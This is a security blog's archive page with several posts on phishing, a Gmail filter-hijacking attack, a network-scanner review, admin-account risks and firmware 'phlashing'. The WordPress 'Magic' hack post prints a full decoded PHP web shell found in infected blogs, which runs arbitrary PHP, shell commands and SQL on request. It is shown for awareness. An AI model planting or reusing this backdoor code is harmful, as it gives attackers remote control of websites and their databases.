Archive for the 'Computer Security' Category
Facebook Imposter Scam
January 17th, 2010

The first time I saw the “impostor scam” was on myspace. One after another about 6 or 7 of my friends myspace accounts were hijacked. What followed was my friends sending me messages about viagra and bogus malware sites. It was obvious that they’d been hacked, but they usually catch it a few days later and send out a message to apologize to everyone. It seems not social network is exempt from the imposter scam.

Enter the Facebook Imposter Scam:
The Facebook Imposter Scam is the same exploit that hit myspace. Users accounts are hacked using phishing techniques. Basically, users are lured into clicking on what looks like a legitimate link, they are scammed into giving out their username and password (sometimes with a phishing site that looks like “facebook” a “facebook imposter”). Once the user enters the username password, the criminal has there information and can do whatever they want. What they typically do is use the account to advertise a product, service or scam to EVERY friend on the victims list. The facebook imposter will even use the victim’s account to scam others.

This scam earned its way on the Internet Crime Complaint Center.

The best way to avoid falling prey to this imposter scam, is to watch out for outbound links. Always hover over alink and look at the bottom right-hand corner of the browser to see where it is actually going. Type in the supposed link into the address bar rather than clicking on outboud links. Pay attention to phishing warnings that myspace, search engines, browsers and facebook give you.

Posted in Computer Security, Main Digg, phishing, Privacy, scam, security by Bruce Brown
4 Comments
Server at Magic Requires Username Password
August 7th, 2009

The WordPress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress Magic Attack

WordPress user Yokima reported this very slick hack.

FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

*Similar issues reported by techartistserver BLAH.fuzz.com at Fuzz Access requires a username and password.”

What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{

if (!function_exists('______safeshell'))

{

function ______safeshell($komut) {

@ini_restore("safe_mode");

@ini_restore("open_basedir");

$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

if (!empty ($komut)) {

if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('system') && !in_array('system', $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;

}

elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

@ exec($komut, $res);

$res = join("\n", $res);

echo $res, "\n";

}

elseif (@ is_resource($f = @ popen($komut, "r"))) {

//$res = "";

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));

}

@ pclose($f);

}

else

{

$res = {$komut};

echo $res;

}

}

}

};

if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

echo "\n";

if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

if (!$result)

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";

die();

}

else if (is_resource($result))

{

$res = array();

while ($row = mysql_fetch_assoc($result))

{

$res[] = $row;

};

mysql_free_result($result);

echo serialize($res);

die();

}

else

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";

die();

}

};

echo "\n\n";

die();

};

};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

Posted in blogging/blog hack, Computer Security, hackers, hacking, I got hacked, information assurance, Internet and Information Technology Security, Main Digg, security, wordpress by Bruce Brown
1 Comment
GFI LANGuard – Review
August 7th, 2009

GFI Languard Network and Security Scanner

I was given the honor of reviewing GFI LANguard network and security scanner. Right off the bat I notice that the interface is very intuitive & easy to use, which is important to a busy security professional that have better things to do with their time than fight with a messy
security tool.

The network scanning tool I normally use is called Retina.
When lining the two up, I have to say Retina is much more powerful, with many more options built in. It can drill way down and do intrusive scans where GFI LANguard v.9 is pretty vanilla. It gives you what you need and that is it.

The simplicity could be an advantage to a system admin doing a security job, because it really is straight to the point. The cost is definitely and advantage. GFI LANguard is about ½ the cost of the Retina Scan tool.

Retina Professional Edition 16 IP Pack – $995.00

GFI LAN Guard goes for about 300+ for 10 licences.

Nessus is considered one of the best network scan tools but its more expensive then both.

What I really like about Retina is that it allows you to scan in accordance with Department of Defense standards, SAN, and others. Languard does look at the SANS Top 20 report vulnerabilities.

If your looking for basic, down to Earth network & security scanner for your small to medium business needs, than GFI Languard is definitely the way to go because you will not beat the cost for the quality and support you get. Its going to give you a thorough assessment of the your systems and even tell you how to fix them. Buy this product!

Posted in Computer Security, information assurance, Internet and Information Technology Security, Main Digg, Network Management, security, Security Management, vulnerabilities by Bruce Brown
4 Comments
Dangers of Surfing the Web with an Admin Account
May 15th, 2009

If you bought a Dell or Gateway, more than likely you only have one account on your computer with no password. That account runs as the administrator. If your system has no user name or password applied, it is running as an administrator account.

This is how so many people get viruses. When you surf the web as an administrator is allows malicious applications (viruses, worms, Trojans and other malware) to download to your computer and run as the administrator. This means they can replace system files with viruses, create back doors and harm other computers on your network. They can also spy on you manipulate your browser or do anything else they want to do.

One way to greatly minimize the effects of viruses is to create accounts on your system and only use the administrator account when its necessary. Create a limited user account that you use when surfing the web, getting into your email or doing other small tasks that don’t require downloading or installing applications.

With a limited account, even if the malware is downloaded, it will not be able to install.

Posted in Computer Security, Computer Security/Home Computer Security, Computer Security/Home Computer Security/Home Computer , information assurance, Main Digg, security, Security Awareness by Bruce Brown
3 Comments
More GMAIL Problems
November 22nd, 2008

This was news I could not ignore because I really, really like Gmail. These hacks are ridiculous. I hope that google is getting a handle on this. It looks like the accounts are getting hacked with some sort of script that runs from a site or email while gmail is opened:

According to David Airey & gnucitizen.org:
The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim’s filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.
gnucitizen

As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.

You can see the whole story on our temporary blog makeuseof-temporary.blogspot.com/

I wasn’t planning to publish anything about the incident or cracker (person who steals domains) and how he managed to pull it off unless I was completely sure about it myself. I had a good feeling it was a Gmail security flaw but wanted to confirm it before posting anything about it on MakeUseOf. We love Gmail and giving them bad publicity is not something we would ever want to do.

Now the thing is the domain name domainsgames.org is protected by Moniker and they hide all the contact info for it.

Domain ID:D154519952-LROR
Domain Name:DOMAINSGAME.ORG
Created On:22-Oct-2008 07:35:56 UTC
Last Updated On:08-Nov-2008 12:11:53 UTC
Expiration Date:22-Oct-2009 07:35:56 UTC
Sponsoring Registrar:Moniker Online Services Inc. (R145-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:MONIKER1571241
.
.
.
.
Name Server:NS3.DOMAINSERVICE.COM
Name Server:NS2.DOMAINSERVICE.COM
Name Server:NS1.DOMAINSERVICE.COM
Name Server:NS4.DOMAINSERVICE.COM

More at Makeusof.com

The Google Fix

Posted in blogging/blog hack, Computer Security, Domain Names, Google Hacks, hackers, I got hacked, Internet and Information Technology Security, Main Digg, security, Security Awareness, Security Awareness/ISSA, Security Management by Bruce Brown
No Comments
Scientists launch new, ‘unbreakable’ encryption system
October 9th, 2008

A new encryption system, which its creators say is unbreakable, got its first test run Wednesday in Vienna, scientists from the European Union project SECOQC announced.

digg user kinthiri explains:
Quantum cryptography is unbreakable because if any 3rd party views it that does not have the credentials and is not the intended recipient, the simple viewing of the encrypted data by that third party changes that data such that even the intended recipient can’t decrypt it. Thus they know that there is a 3rd party viewing the stream. Effectively the data self destructs if anyone attempts to intercept it or decrypt it. This is not a new phenomenon.

What is new is that its being used commercially. It had previously been used experimentally by the military in association with researchers, but this is the first time its been brought to life outside test environments and is available commercially.

The nature of quantum mechanics makes this truly unbreakable. You couldn’t even factor this using your own quantum computer, if you could even get one with enough qbits.

read more | digg story

Posted in Certification/Security+/Basic Cryptography/Crypto Algorithms, Computer Security, Encryption, Main Digg, quantum key distribution by elamb
No Comments
Challenges of Internet Security
September 9th, 2008

The primary challenges of Internet security have everything to do with balancing accessibility and functionality with the three pillars of information security: confidentiality, integrity and availability.

The Internet has become an in disposable tool for research, commerce, art, education and virtually every part of modern life. It was the inquisitive, intelligent, intuitive and creative nature of humanity that created the Internet and its those same qualities that put individual systems linked directly to the Internet in peril. The three pillars of information security are at stake for all systems with connectivity to the Internet. The challenge is in the implementation of the necessary security controls to achieve those three pillars.

Confidentiality:

Confidentiality pertains to protecting sensitive information. Sensitive information can be anything from private user information to classified defense data. Many organization live and die by the protection of proprietary information from competitors. During wartime, the armed services literally LIVE or DIE based on how well certain sensitive information is guarded. In the US Department of Defense is called Operational Security. Since the Internet is a critical part of the DoD (and defense organizations around the world) the confidentiality is a HUGE challenge for their Information systems exposed to the Internet. Some of the threats to there systems include: social engineering, leaks of information and accidental release of sensitive data. All of these threats can be enabled via the Internet.

Organizations must educate their user who have access to sensitive information. I’ve heard some security professionals say that educating users is bad.

But if your users have access to sensitive information (and need to have that access to do their jobs) it is imperative that they not only know WHAT is sensitive, but WHO it can be give to, WHEN it can be shared, HOW it can be share and WHY it can be shared.


Integrity:

Data integrity is very important to all systems passing data on the Internet. Integrity has to do with whether or not the message on the other end of your connection is the same one you actually sent. Whether its your passwords being passed to your bank or the DoD passing data over the Internet, the integrity of the data is imperative. Its often taken for granted until, we are sending an email and the receiver says they got the email but the message can’t be read. Sometimes if the messages integrity is garbled or malformed it simply won’t reach its destination. If the integrity of a message can not be protected in some way or verified and checked, it is possible for someone to intercept your message, alter it, and send it on its way. Integrity is especially critical in banking and financial transactions which is why encryption and authentication take on such an important role for sensitive transactions such as ATM withdrawals, and online banking.

The challenge to maintaining Internet integrity is to ensure that link is encrypted when necessary.


Availability:

If there is no availability there is no mission, no business, no functionality. One of the major challenges of Internet security has been Denial of Services attacks. A Denial of Service attack is when your system on the Internet (or within a network) is flooded with useless traffic such that no one else (not even you) can use it. With a misconfiguration, a denial of service can happen by accident. Its important to test the availability of an online system. Its also a good practice to see what kind of availability and access you are giving. After all, too much availability can compromise the security of your system.

Most challenges of Internet security can tie into one or more of the big three: confidentiality, confidentiality or availability. With those in mind most challenges can be overcome. But the double edged sword of security.. the very nature of it on the Internet is to constantly change and evolve with the Internet. The constant change of threats to those three aspects of security is perhaps the biggest over arching challenge.

Posted in Broadband Internet Security, Certification/Security+/General Security Concepts/Malware, Computer Security, Computer Security/Home Computer Security, Encryption, Internet and Information Technology Security, Main Digg, Network Management, security, Security Awareness, System security engineering by Bruce Brown
1 Comment
Why is Internet Safety Important
September 3rd, 2008

Dangers on the Internet
The amazing freedom and availability of the Internet lends itself to a few major dangers: Pr0n, malware and how to perform illegal and/or dangerous activities.

Whether it is a curious person seeking these things out or the child accidentally clinking the wrong link and getting bombard with explicit pop-ups, the items lists can be harmful to an impressionable mind. Policies must be enforced.

There are a few groups that should have limited exposure to certain types of information on the Internet. Children, mentally handicapped or psychologically damaged people in settings such as schools, homes, rehabilitation or correctional facilities and group homes should be blocked, tracked and monitored while accessing the Internet. Certain information could destroy them if they don’t yet have the capacity to understand or put certain information in the proper context.


Protection from Pornography & Malware

In a professional setting there should be a written policy against accessing and/or downloading unacceptable material such as pornography. These items should be actively blocked whether in a working environment or at home among minors accessing the same system. Allowing impressionable or fragile minds unlimited access to certain graphic material is irresponsible. The law is also a good reason why Internet safety is important. If you are the owner or charged with immediate control of the system being used for illegal activity, you could be partially or wholly liable for the activity. An example is substitute teacher Julie Amero

On October 19, 2004, Julie Amero was substituting for a seventh-grade language class at Kelly Middle School in Norwich, Connecticut. The teacher’s computer was accessed by pupils while the regular teacher, Matthew Napp, was out of the room. When Julie took charge, the computer started showing pornographic images.

On January 5, 2007, Amero was convicted in Norwich Superior Court on four counts of risk of injury to a minor, or impairing the morals of a child. Her sentencing was delayed four times after her conviction, with both the prosecution and judge not satisfied that all aspects of the case had been assessed.[1] The felony charges for which she was originally convicted carry a maximum prison sentence of 40 years

– wikipedia

The Kelly Middle School systems were actually infected with malware that allowed the explicit pictures to pop up.

Access to Dangerous information

From the Columbine shooters to the Virginia Tech massacre, most of the killers had a recorded history of mental illness and/or psychologically instability. In many cases, they used public and/or home computers belonging to their parents to research bomb making or even purchase guns.

Controlling access is the best way to get on the Internet safely. Maintaining privacy of users is another important step in Internet safety, however that is a matter of educating users particularly if the frequent Social networks such as facebook or myspace. They need to be instructed about the dangers of stalkers, perverts and predators looking specifically for impressionable minds.

We are the keepers of these impressionable and fragile minds. That is the reason Internet safety is important and why we must be mindful of these subjects.

Posted in Computer Security, Computer Security/Home Computer Security, Computer Security/Home Computer Security/Home Computer , Main Digg, Malware, myspace, personal computer security, podcast, security, Security Management by Bruce Brown
4 Comments
Church File Security
August 25th, 2008

Whether government, corporate or faith-based file security is important.

No matter the denomination, church file security is especially important because it may not only deal with money, and privacy but the sanctity of the church community. The member, guest and family information must be protected just as much as the preacher, reverend, deacons, bishops, nuns, and/or administrators.

Coordination of church file security:
It is important to first identify what are the churches sensitive data. You may have in your mind what is or isn’t important files to protect for the church, but you may not have the authority or prerogative to make such an important determination. Even if you do, it important to get ideas from the staff and or clergy of what files should be protected and what level of protection should be considered. And interview or meeting with information owners is the first step.

Access to the church files:
Anyone with access to the church files should sign a user license agreement. This is a standard for security no matter what organization you enter. This is to make sure that those who are trusted with access understand what they can and can not do when entering the system. Items in a basic user license agreement include: what can be copied and/or installed on the system, what can and can not be done while accessing church files, whether or not church files are monitored for heightened security. User License agreements are usually done when multiple people have access to a medium to large network with critical resource (i.e. privacy data, financial information, sensitive data). They are also done for software, website/forum and data base access.

You can find examples of a user license agreement on the Internet.

What Church Files to Protect:
Files in a church community may include mission, member, drive, donation and service information that need to be protected. Any files dealing with any money should be protected always. Personal files of church members should be protected as well as data bases with potentially sensitive information. Even if the church has NO sensitive information, the files that allow any access from the Internet (such as webpages or ftp files and folders) should protected with various levels of security including: Username password (don’t EVER use anonymous for FTP), mandatory user registrations, and file permission lock down.

The reason this is important even for churches with no sensitive information, is that some malicious hackers like to use other organizations resources to upload viruses, spam, scams and pornography.

Regulations to consider:
The Privacy Act of 1974 make it mandatory to protect the personal information of all individuals

No agency shall disclose any record which is contained in a system of records by any means of communication to any person, or to another agency, except pursuant to a written request by, or with the prior written consent of, the individual to whom the record pertains, MORE

Health Insurance Portability and Accountability Act (HIPAA) is another important law to consider when addressing church file security. Among other things, HIPAA deals with the protection of peoples medical and health history.

File Permission:
Files that are sensitive for a church should have some permissions assigned to them to allow only authorized users (system administrators, missionaries, clergy, secretaries) access. This is one part of the access control. Most operating systems have this capability. Don’t forget that not only computers need to be protected, routers, switches and databases also need adequate security.

Posted in Access Control, Certification/Security+/General Security Concepts/Common, Certification/Security+/General Security Concepts/Malware, Computer Security, Main Digg, security by Bruce Brown
1 Comment
Phlash Dance: phlashing
June 9th, 2008

phlash dancePhlashing allows you to damage hardware over the Internet. This is something new and consists of flashing, as in changing the firmware, or computer code in chips on your motherboard, controller cards or other hardware. Since more modern systems allow flashing firmware over a network for quick updates, this is now an exploitable vulnerability. Previously, you had to “flash” those computer chips from the machine that contained them.

There are security features in hardware to prevent this kind of vandalism, but unfortunately some flaws enable hackers to flash destructively. Phlashing code has already been developed by security researchers and hackers. Phlashing attacks are not easy and will likely not be common, however its a possible glimpse of the coming storm of weapons of cyber destruction.

“Phlashing” attacks could render network hardware useless
Most computer security coverage focuses on the PC realm, but Rich Smith, head of HP’s Systems Security Lab, has identified a potential security flaw within a network’s physical hardware rather than a typical desktop or server system. Smith’s report focuses on a class of devices he refers to as Network Enabled Embedded Devices (NEEDS for short), and how such systems could be attacked at the firmware level through a process he refers to as “phlashing.” – more at Arstechnica

Posted in Computer Security, hacking, I got hacked, Main Digg, Malware, Security Awareness by Bruce Brown
No Comments
Previous Entries
Next Entries